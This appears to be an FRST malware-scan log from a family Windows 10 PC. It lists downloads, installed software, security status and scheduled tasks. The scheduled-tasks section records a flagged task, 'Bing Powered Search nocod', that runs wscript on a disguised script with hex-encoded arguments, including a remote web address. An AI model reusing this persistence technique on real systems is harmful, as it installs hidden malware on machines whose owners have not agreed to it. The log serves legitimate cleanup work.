2018-11-12 17:10 - 2018-11-12 17:12 - 000000000 ____D C:\AdwCleaner
2018-11-12 17:09 - 2018-11-12 17:09 - 007592144 _____ (Malwarebytes) C:\Users\User\Downloads\adwcleaner_7.2.4.0.exe
2018-11-11 22:19 - 2018-11-13 22:08 - 000000000 ____D C:\FRST
2018-11-11 22:11 - 2018-11-11 22:12 - 002415616 _____ (Farbar) C:\Users\User\Downloads\englishFRST64.exe
2018-11-11 13:25 - 2018-11-11 13:25 - 000012494 _____ C:\Users\User\Desktop\němčina gramatika.odt
2018-11-10 19:54 - 2018-11-10 19:55 - 001867936 _____ C:\Users\User\Downloads\brezen.zip
2018-11-10 19:53 - 2018-11-10 19:53 - 000693460 _____ C:\Users\User\Downloads\ctenarka (1).zip
2018-11-10 19:51 - 2018-11-10 19:51 - 000693460 _____ C:\Users\User\Downloads\ctenarka.zip
2018-11-10 19:49 - 2018-11-10 19:50 - 003959075 _____ C:\Users\User\Downloads\Justa unor (1).zip
2018-11-10 19:48 - 2018-11-10 19:48 - 003959075 _____ C:\Users\User\Downloads\Justa unor.zip
2018-11-10 19:47 - 2018-11-10 19:47 - 002216875 _____ C:\Users\User\Downloads\Justynka.zip
2018-11-09 21:21 - 2018-11-09 22:15 - 940553174 _____ C:\Users\User\Downloads\Mladý papež_2.avi
2018-11-08 20:14 - 2018-11-08 22:42 - 1632666636 _____ C:\Users\User\Downloads\Mladý papež, Young Pope, The (CZ) S01E02.mkv
2018-11-06 14:05 - 2018-09-04 23:36 - 001476904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcupdate_GenuineIntel.dll
2018-11-04 15:26 - 2018-11-04 15:26 - 000000000 ____D C:\Users\User\Documents\Aufgabenprogramm-1539448330382
2018-11-04 15:22 - 2018-11-04 15:23 - 004712808 _____ C:\Users\User\Downloads\Aufgabenprogramm-1539448330382.zip
2018-11-01 19:56 - 2018-11-01 19:56 - 000000000 ____D C:\Users\Default\AppData\Local\Google
2018-11-01 19:56 - 2018-11-01 19:56 - 000000000 ____D C:\Users\Default User\AppData\Local\Google
2018-10-31 22:31 - 2018-10-31 22:31 - 000001561 _____ C:\Users\User\Desktop\Skype.lnk
2018-10-30 18:34 - 2018-10-30 18:35 - 062774584 _____ (Skype Technologies S.A.) C:\Users\User\Downloads\Skype-8.33.0.50.exe
2018-10-28 14:00 - 2018-10-28 14:02 - 004712808 _____ C:\Users\User\Downloads\Aufgabenprogramm-1539448330382 (2).zip
2018-10-28 12:20 - 2018-10-28 12:20 - 000002478 _____ C:\Users\User\Desktop\Ben - Chrome.lnk
2018-10-28 12:19 - 2018-10-28 12:19 - 000002478 _____ C:\Users\User\Desktop\máta - Chrome.lnk
2018-10-28 12:14 - 2018-10-28 12:14 - 000002478 _____ C:\Users\User\Desktop\justa1 - Chrome.lnk
2018-10-28 12:13 - 2018-10-28 12:13 - 000002434 _____ C:\Users\User\Desktop\Profil 1 - Chrome.lnk
2018-10-27 16:25 - 2018-10-27 17:55 - 982706004 _____ C:\Users\User\Downloads\Rapl-13.díl.avi
2018-10-27 15:07 - 2018-10-27 15:58 - 946186000 _____ C:\Users\User\Downloads\Rapl 12 - Zdař Bůh!.avi
2018-10-27 12:29 - 2018-10-27 13:37 - 692434054 _____ C:\Users\User\Downloads\Rapl_11_Ticha_voda.avi
2018-10-27 11:17 - 2018-10-27 12:21 - 696309100 _____ C:\Users\User\Downloads\Rapl_10_Black_Jack.avi
2018-10-27 08:48 - 2018-10-27 09:41 - 925466496 _____ C:\Users\User\Downloads\Rapl-9.Amok-(2016).avi
2018-10-27 07:54 - 2018-10-27 08:21 - 506081064 _____ C:\Users\User\Downloads\Rapl -8.díl -Agent novinka.avi
2018-10-26 20:31 - 2018-10-26 20:31 - 000000000 ___RD C:\Users\User\Downloads\Microsoft.SkypeApp_kzf8qxf38zg5c!App
2018-10-26 15:11 - 2018-10-26 16:38 - 962589480 _____ C:\Users\User\Downloads\Rapl 7.díl.avi
2018-10-26 14:27 - 2018-10-26 15:03 - 667978888 _____ C:\Users\User\Downloads\Rapl- 6.Oheň MPEG-TS Nefina.mkv
2018-10-26 12:19 - 2018-10-26 13:00 - 715322368 _____ C:\Users\User\Downloads\Rapl 5. Zatmění.avi
2018-10-25 22:25 - 2018-10-25 23:32 - 742247328 _____ C:\Users\User\Downloads\Rapl 4. Bludný kořen.avi
2018-10-25 20:57 - 2018-10-25 22:23 - 959896590 _____ C:\Users\User\Downloads\Rapl 3.díl.avi
2018-10-25 18:37 - 2018-10-25 19:32 - 602106322 _____ C:\Users\User\Downloads\Rapl 2.Křížová cesta.avi
2018-10-24 20:31 - 2018-10-24 21:01 - 505367598 _____ C:\Users\User\Downloads\Rapl 01 Nástřel.avi
2018-10-24 14:41 - 2018-10-24 14:34 - 000042456 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswKbd.sys
2018-10-24 14:39 - 2018-10-24 14:35 - 000378584 _____ (AVAST Software) C:\WINDOWS\system32\aswBoot.exe
2018-10-23 14:07 - 2018-10-23 14:07 - 000000298 _____ C:\Users\User\Downloads\desktop (1).ini
2018-10-20 16:06 - 2018-10-20 16:56 - 548656230 _____ C:\Users\User\Downloads\Génius - Einstein (6).avi
2018-10-20 15:14 - 2018-10-20 16:03 - 527352300 _____ C:\Users\User\Downloads\Génius - Einstein (5).avi
2018-10-20 14:09 - 2018-10-20 15:01 - 565387930 _____ C:\Users\User\Downloads\Génius - Einstein (4) (1).avi
2018-10-20 13:37 - 2018-10-20 13:58 - 209649664 _____ C:\Users\User\Downloads\Génius - Einstein (4).avi
2018-10-20 12:35 - 2018-10-20 13:27 - 571699030 _____ C:\Users\User\Downloads\Génius - Einstein (3).avi
2018-10-16 19:14 - 2018-10-16 19:44 - 535513208 _____ C:\Users\User\Downloads\Labyrint III.7.dil.avi
2018-10-16 15:14 - 2018-10-16 15:15 - 000303888 _____ C:\Users\User\Downloads\ausmalbild184.pdf
2018-10-14 18:10 - 2018-10-14 19:09 - 644310216 _____ C:\Users\User\Downloads\Génius - Einstein (2).avi
2018-10-14 17:30 - 2018-10-23 20:20 - 000015108 _____ C:\Users\User\Desktop\němčina reise.odt

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-11-13 22:09 - 2018-09-13 13:57 - 000000000 ____D C:\Users\User\AppData\Local\AVAST Software
2018-11-13 22:07 - 2018-04-12 00:38 - 000000000 ___HD C:\Program Files\WindowsApps
2018-11-13 22:07 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\AppReadiness
2018-11-13 22:06 - 2018-04-12 00:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2018-11-13 22:05 - 2018-07-01 14:58 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2018-11-13 22:05 - 2016-09-13 06:38 - 000001006 _____ C:\WINDOWS\Tasks\Bing Powered Search nocod.job
2018-11-13 22:04 - 2018-04-11 22:04 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2018-11-13 22:04 - 2016-09-07 15:20 - 000065536 _____ C:\WINDOWS\system32\spu_storage.bin
2018-11-13 20:33 - 2018-07-01 14:58 - 000004210 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{9CB99F3C-2641-4460-8D80-FF3A7E2045E2}
2018-11-13 20:28 - 2018-07-01 14:15 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2018-11-13 08:03 - 2016-09-07 19:27 - 000002293 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-11-13 08:03 - 2016-09-07 19:27 - 000002252 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2018-11-12 18:51 - 2018-09-24 17:30 - 000003830 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2018-11-12 18:51 - 2018-09-24 17:30 - 000003530 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2018-11-12 18:51 - 2018-07-01 14:58 - 000003742 _____ C:\WINDOWS\System32\Tasks\Bing Powered Search nocod
2018-11-12 18:51 - 2018-07-01 14:58 - 000003558 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2018-11-12 18:51 - 2018-07-01 14:58 - 000003482 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2018-11-12 18:51 - 2018-07-01 14:58 - 000003334 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2018-11-12 18:51 - 2018-07-01 14:58 - 000002860 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3294147820-2580206503-2443620995-1001
2018-11-12 18:51 - 2018-07-01 14:58 - 000000000 ____D C:\WINDOWS\System32\Tasks\AVAST Software
2018-11-12 17:35 - 2018-09-10 15:57 - 000000000 ____D C:\Users\User\AppData\Local\CrashDumps
2018-11-12 17:13 - 2016-09-07 13:14 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2018-11-12 17:13 - 2016-09-07 13:14 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2018-11-12 06:44 - 2018-09-24 17:20 - 000000000 ____D C:\Users\User\AppData\LocalLow\Mozilla
2018-11-12 06:44 - 2016-09-07 19:20 - 000000000 ____D C:\Users\User\AppData\Roaming\Mozilla
2018-11-12 06:44 - 2016-09-07 13:14 - 000001232 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2018-11-11 23:44 - 2016-09-06 19:24 - 000000000 ___RD C:\Users\User\OneDrive
2018-11-11 23:19 - 2018-07-01 14:58 - 000000000 ____D C:\WINDOWS\System32\Tasks\McAfee
2018-11-11 23:18 - 2018-04-12 00:38 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2018-11-11 23:18 - 2018-04-11 22:04 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2018-11-11 23:10 - 2015-07-10 10:05 - 000000000 ____D C:\Users\Default.migrated
2018-11-10 15:43 - 2016-09-06 19:21 - 000000000 ____D C:\Users\User\AppData\Local\VirtualStore
2018-11-09 23:30 - 2018-04-12 00:36 - 000000000 ____D C:\WINDOWS\INF
2018-11-09 21:22 - 2016-09-18 10:52 - 000000000 ____D C:\Users\User\AppData\Roaming\vlc
2018-11-09 20:02 - 2018-07-01 14:58 - 000004264 _____ C:\WINDOWS\System32\Tasks\Avast Emergency Update
2018-11-08 21:50 - 2018-07-01 14:20 - 000002433 _____ C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2018-11-08 15:33 - 2018-04-12 00:30 - 000000000 ____D C:\WINDOWS\CbsTemp
2018-11-07 15:36 - 2018-07-01 14:34 - 002435636 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2018-11-07 15:36 - 2018-07-01 11:55 - 000671522 _____ C:\WINDOWS\system32\perfh005.dat
2018-11-07 15:36 - 2018-07-01 11:55 - 000136624 _____ C:\WINDOWS\system32\perfc005.dat
2018-11-07 15:36 - 2018-04-12 17:13 - 000705444 _____ C:\WINDOWS\system32\perfh007.dat
2018-11-07 15:36 - 2018-04-12 17:13 - 000141952 _____ C:\WINDOWS\system32\perfc007.dat
2018-11-01 19:59 - 2018-08-18 14:38 - 000002073 _____ C:\Users\Public\Desktop\Google Slides.lnk
2018-11-01 19:59 - 2018-08-18 14:38 - 000002071 _____ C:\Users\Public\Desktop\Google Sheets.lnk
2018-11-01 19:59 - 2018-08-18 14:38 - 000002061 _____ C:\Users\Public\Desktop\Google Docs.lnk
2018-11-01 19:59 - 2018-08-18 14:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Backup and Sync from Google
2018-11-01 17:19 - 2018-09-29 08:41 - 000000000 ____D C:\Users\User\Desktop\justy fotak
2018-10-24 14:36 - 2018-07-01 13:06 - 000467904 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswSP.sys
2018-10-24 14:36 - 2018-07-01 13:06 - 000381144 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswVmm.sys
2018-10-24 14:36 - 2018-07-01 13:06 - 000208640 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswStm.sys
2018-10-24 14:35 - 2018-07-01 13:06 - 000201408 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswArPot.sys
2018-10-24 14:35 - 2018-07-01 13:06 - 000163376 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswMonFlt.sys
2018-10-24 14:35 - 2018-07-01 13:06 - 000111968 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswRdr2.sys
2018-10-24 14:35 - 2018-07-01 13:06 - 000088112 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswRvrt.sys
2018-10-24 14:35 - 2018-07-01 13:06 - 000047064 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswHwid.sys
2018-10-24 14:31 - 2018-07-01 13:06 - 001028840 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswSnx.sys
2018-10-24 14:30 - 2018-06-17 21:25 - 000185240 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswHdsKe.sys
2018-10-24 14:29 - 2018-07-01 13:06 - 000346760 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswbloga.sys
2018-10-24 14:29 - 2018-07-01 13:06 - 000230512 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswbidsdrivera.sys
2018-10-24 14:29 - 2018-07-01 13:06 - 000201928 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswbidsha.sys
2018-10-24 14:29 - 2018-07-01 13:06 - 000059664 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswbuniva.sys
2018-10-24 14:21 - 2016-09-07 15:22 - 000559880 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2018-10-23 16:20 - 2018-07-01 15:59 - 000000000 ____D C:\ProgramData\Packages
2018-10-22 16:53 - 2016-09-07 20:02 - 000002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-10-16 15:28 - 2016-09-12 17:33 - 000000000 ____D C:\ProgramData\firebird

==================== Files in the root of some directories =======

2018-06-17 20:58 - 2018-06-17 20:58 - 007649280 _____ () C:\Program Files (x86)\GUT4060.tmp
2017-01-03 20:30 - 2017-01-03 20:30 - 007680000 _____ () C:\Program Files (x86)\GUT62F7.tmp
2016-09-13 06:38 - 2016-09-13 06:38 - 000019963 _____ () C:\Users\User\AppData\Roaming\Muledaralo

Some files in TEMP:
====================
2018-11-12 17:31 - 2018-06-06 17:30 - 000999400 _____ (McAfee, Inc.) C:\Users\User\AppData\Local\Temp\0322801542040262mcinst.exe
2001-09-29 01:30 - 2001-09-29 01:30 - 000483386 ____N (Microsoft Corporation) C:\Users\User\AppData\Local\Temp\EBUE187.exe
2018-09-24 19:34 - 2018-09-24 19:35 - 062481400 _____ (Skype Technologies S.A.) C:\Users\User\AppData\Local\Temp\SkypeSetup.exe
2018-10-08 12:45 - 2018-10-08 12:46 - 040210008 _____ () C:\Users\User\AppData\Local\Temp\vlc-3.0.4-win32.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-07-01 14:15

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 11.11.2018
Ran by User (13-11-2018 22:13:16)
Running from C:\Users\User\Downloads
Windows 10 Home Version 1803 17134.345 (X64) (2018-07-01 14:01:51)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3294147820-2580206503-2443620995-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3294147820-2580206503-2443620995-503 - Limited - Disabled)
Gast (S-1-5-21-3294147820-2580206503-2443620995-501 - Limited - Disabled)
User (S-1-5-21-3294147820-2580206503-2443620995-1001 - Administrator - Enabled) => C:\Users\User
WDAGUtilityAccount (S-1-5-21-3294147820-2580206503-2443620995-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 19.008.20080 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 30.0.0.107 - Adobe Systems Incorporated)
Adobe Flash Player 31 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 31.0.0.122 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.3 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.3.4.204 - Adobe Systems, Inc.)
Aiseesoft Blu-ray Player 6.2.30 (HKLM-x32\...\{3E1A13C3-E458-4995-BEA6-4B9BE279D502}_is1) (Version: 6.2.30 - Aiseesoft Studio)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 18.7.2354 - AVAST Software)
Backup and Sync from Google (HKLM\...\{608EBDC6-D18A-4CF6-AD54-EE6B71D29065}) (Version: 3.43.1584.4446 - Google, Inc.)
Bontia Studio (HKLM-x32\...\{9543751a-3deb-418d-b86d-5af77ebdc033}) (Version: 5.3.4304.21839 - Bontia a.s.)
Bontia Studio 5.3 (HKLM-x32\...\{278BD020-1DCD-46C2-B9F6-36E88E10AC64}) (Version: 5.3.4304.0 - Bontia, a.s.) Hidden
CDBurnerXP (HKLM\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.7.6321 - CDBurnerXP)
Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.66.16.50 - Conexant)
Conexant SmartAudio (HKLM\...\SAII) (Version: 6.0.224.0 - Conexant Systems)
DAPlayer 1.0.1.9 (HKLM-x32\...\DAPlayer_is1) (Version: - Digiarty Software,Inc.)
Dolby Digital Plus Advanced Audio (HKLM\...\{B0BFC63F-EA07-419E-960B-3FB2ED5DD0B2}) (Version: 7.6.5.1 - Dolby Laboratories Inc)
ELAN Touchpad 11.15.0.18_X64 (HKLM\...\Elantech) (Version: 11.15.0.18 - ELAN Microelectronic Corp.)
Galileo Family Quiz - Spezial II (HKLM-x32\...\Galileo Family Quiz - Spezial II) (Version: - SevenOne Intermedia)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 70.0.3538.102 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden
Grundwortschatz Deutsch (HKLM-x32\...\{1FF5F853-B241-4C3B-B58B-EE862472DB09}) (Version: 1.00.0000 - x)
Chromium (HKU\S-1-5-21-3294147820-2580206503-2443620995-1001\...\Chromium) (Version: 51.0.2672.0 - Chromium)
Java 8 Update 101 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
Java 8 Update 181 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180181F0}) (Version: 8.0.1810.13 - Oracle Corporation)
Java 8 Update 181 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180181F0}) (Version: 8.0.1810.13 - Oracle Corporation)
Lenovo EasyCamera (HKLM-x32\...\{E399A5B3-ED53-4DEA-AF04-8011E1EB1EAC}) (Version: 6.3.9600.11103 - Realtek Semiconductor Corp.)
Lernerfolg Grundschule Deutsch Teil 1 und 2 (HKLM-x32\...\{0309FEDE-8014-4DA7-BCEE-DBD5F2A02176}_is1) (Version: LernerfolgGerman 12 v2013 - Tivola)
Lernerfolg Grundschule Englisch Teil 1 und 2 (HKLM-x32\...\{CCF09A05-0B9D-4881-B015-C99637DEB6E4}_is1) (Version: LernerfolgEnglish 12 v2013 - Tivola)
Lernerfolg Grundschule Mathematik Teil 1 und 2 (HKLM-x32\...\{26A5F720-DCF2-4E8E-8BE5-F229041CE1BF}_is1) (Version: LernerfolgMathe 12 v2013 - Tivola)
Microsoft OneDrive (HKU\S-1-5-21-3294147820-2580206503-2443620995-1001\...\OneDriveSetup.exe) (Version: 18.192.0920.0015 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50428.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Zoo Tycoon (HKLM-x32\...\Zoo Tycoon 1.0) (Version: - )
Mozilla Firefox 57.0 (x64 de) (HKLM\...\Mozilla Firefox 57.0 (x64 de)) (Version: 57.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 57.0.0.6525 - Mozilla)
OpenOffice 4.1.2 (HKLM-x32\...\{69D27D4C-36CE-4CB2-A290-C38B0A990955}) (Version: 4.12.9782 - Apache Software Foundation)
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9.141.259 - Google, Inc.)
Pomocník s aktualizací Windows 10 (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22452 - Microsoft Corporation)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{5009B7EE-8A15-4A23-B404-15E31D02DA67}) (Version: 2.43.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM\...\{A7B60FC9-A750-43C7-B7EC-892CD09147C7}) (Version: 1.18.0.0 - Microsoft Corporation) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.3 - VideoLAN)
Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version: - )
WinRAR 5.60 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.60.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync64.dll [2018-10-04] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync64.dll [2018-10-04] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync64.dll [2018-10-04] (Google)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-10-24] (AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-10-24] (AVAST Software)
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-10-24] (AVAST Software)
ContextMenuHandlers1: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2018-10-04] (Google)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-06-24] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-06-24] (Alexander Roshal)
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-10-24] (AVAST Software)
ContextMenuHandlers4: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2018-10-04] (Google)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-10-24] (AVAST Software)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-06-24] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-06-24] (Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {048FD072-7F98-4B21-82C8-BFE8E38E904A} - System32\Tasks\Bing Powered Search nocod => C:\WINDOWS\system32\wscript.exe "C:\ProgramData\{5139945A-DB7B-1E9C-5DBD-80DEC7FF0B10}\tose.txt" "687474703a2f2f79786870612e636f6d" "433a5c50726f6772616d446174615c7b35313339393435412d444237422d314539432d354442442d3830444543374646304231307d5c6669646f7361" "433a5c50726f6772616d446174615c7b35313339393435412d444237422d314539432d354442 (the data entry has 78 more characters). <==== ATTENTION
Task: {14005E01-FA72-4914-ABDC-954672515EF2} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {1B1101F4-DC82-4ED8-AF68-4AC641C96DAE} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-07] (Google Inc.)
Task: {29BB56C9-7813-4F20-B6ED-721096C9B89D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-07] (Google Inc.)
Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\WINDOWS\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-12] ()
Task: {70F06EB7-FED0-4BE2-8E5B-31775CF4FA92} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-08-13] (Adobe Systems Incorporated)
Task: {7B19520C-4083-438D-9084-D1575EC83544} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_31_0_0_122_pepper.exe [2018-10-10] (Adobe Systems Incorporated)
Task: {860CD76A-FE28-46BE-9F28-8A2A835C7244} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2018-10-24] (AVAST Software)
Task: {BCF90CA8-52B6-470A-9797-5AD9233DB22B} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [2018-10-29] (AVAST Software)
Task: {EAF62F53-52F6-413C-8394-451FABB2D0EE} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-10-10] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Bing Powered Search nocod.job => Wscript.exe C:\ProgramData\{5139945A-DB7B-1E9C-5DBD-80DEC7FF0B10}\tose.txt <==== ATTENTION

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


